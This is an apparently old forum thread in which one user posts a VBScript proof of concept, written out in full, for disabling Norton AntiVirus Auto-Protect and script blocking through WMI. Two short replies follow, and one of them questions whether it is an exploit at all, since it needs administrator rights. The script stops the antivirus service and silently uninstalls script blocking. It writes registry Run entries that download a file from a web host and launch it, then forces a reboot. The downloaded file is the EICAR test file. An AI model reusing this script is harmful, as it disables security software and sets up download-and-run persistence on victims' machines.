Norton Anti-Virus Script Blocking Bypass

[recca]

Just wanted you all to know there is a ner exploit against NAV 2004 / 2005 wich allows the shutdown and bypass of norton's auto protection .
So all you norton users beware.
Since ther is no patch yet
Here follows the proof of principle so you know what to expect:

Code:

--------------//// BEGIN DISABLE_NAV.VBS ////-----------------

' ----- DISABLE NORTON AUTO-PROTECT SERVICE WITH WMI -----

sServer = "."
Set oWMI = GetObject("winmgmts://.")

sServiceName = "Norton AntiVirus Auto-Protect Service"
sWQL = "Select state from Win32_Service " _
& "Where displayname='" & sServiceName & "'"
Set oResults = oWMI.ExecQuery(sWQL)
For Each oService In oResults
oService.StopService
oService.ChangeStartMode("Disabled")
Next

' -------- UNINSTALL SCRIPT BLOCKING WITH WMI ;) ----------

const HKEY_LOCAL_MACHINE = &H80000002

strComputer = "."

Set objRegistry =
GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
strValueName = "Uninstall Norton Script Blocking"
arrStringValues = ("MSIEXEC /x {D327AFC9-7BAA-473A-8319-6EB7A0D40138} /Q")
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName,
arrStringValues

' -------- CREATE VBS FILE TO GRAB THE EICAR AV-REFERENCE FILE ---------

Set objRegistry =
GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
strValueName = "Create Code Downloader"
arrStringValues = ("cmd /c ECHO Set
X=CreateObject("+chr(34)+"Microsoft.XMLHTTP"+chr(34)+"):X.open
"+chr(34)+"GET"+chr(34)+",("+chr(34)+"http://www.eicar.org/download/eicar.com"+chr(34)+"),False:X.s end:set
Y=createobject("+chr(34)+"adodb.stream"+chr(34)+"):Y.type=1:Y.open:Y.write
X.responseBody:Y.savetofile("+chr(34)+"eicar.com"+chr(34)+"),2:Y.close >
estart.VBS")
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName,
arrStringValues

' -------- CREATE VBS FILE THAT TRIGGERS CODE LAUNCH ----------

Set objRegistry =
GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
strValueName = "Create Code Launcer"
arrStringValues = ("cmd /c ECHO wscript.sleep(10000):Set
Z=CreateObject("+chr(34)+"WSCript.Shell"+chr(34)+"):Z.run("+chr(34)+"cmd
/k eicar.com"+chr(34)+") > elaunch.vbs")
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName,
arrStringValues

' -------- LAUNCH EICAR DOWNLOADER ----------

Set objRegistry =
GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
strKeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
strValueName = "Execute Code DownLoader"
arrStringValues = ("estart.vbs")
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName,
arrStringValues

' -------- RUN THE 'VIRUS' ----------

Set objRegistry =
GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv")
str KeyPath = "SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
strValueName = "Execute Malicious Code Launcher"
arrStringValues = ("elaunch.vbs")
objRegistry.SetStringValue HKEY_LOCAL_MACHINE, strKeyPath, strValueName,
arrStringValues

' ---- USE WMI TO FORCE A REBOOT -- NEXT LOGIN, PWN3D ----

Set wmi = GetObject("winmgmts:{(Shutdown)}")
set objset = wmi.instancesof("win32_operatingsystem")
for each obj in objset
set os = obj : exit for
next
os.win32shutdown 2 + 4

--------------//// END DISABLE_NAV.VBS ////-----------------

[bucket]

recca,

I just d/l a Symantec patch named WMI update for my copy of NAV 2003.
My copy of NAV 2003 Professional doesn't seem to need a WMI patch.
At least, it isn't forthcoming from the folks at Symantec.

[Timmy77]

Since you're using WMI to cause this shutdown, you would need administrator rights on the box in order to run this script, correct? This, to me, seems like less of an exploit and more of an automated way to disable NAV if you're an admin.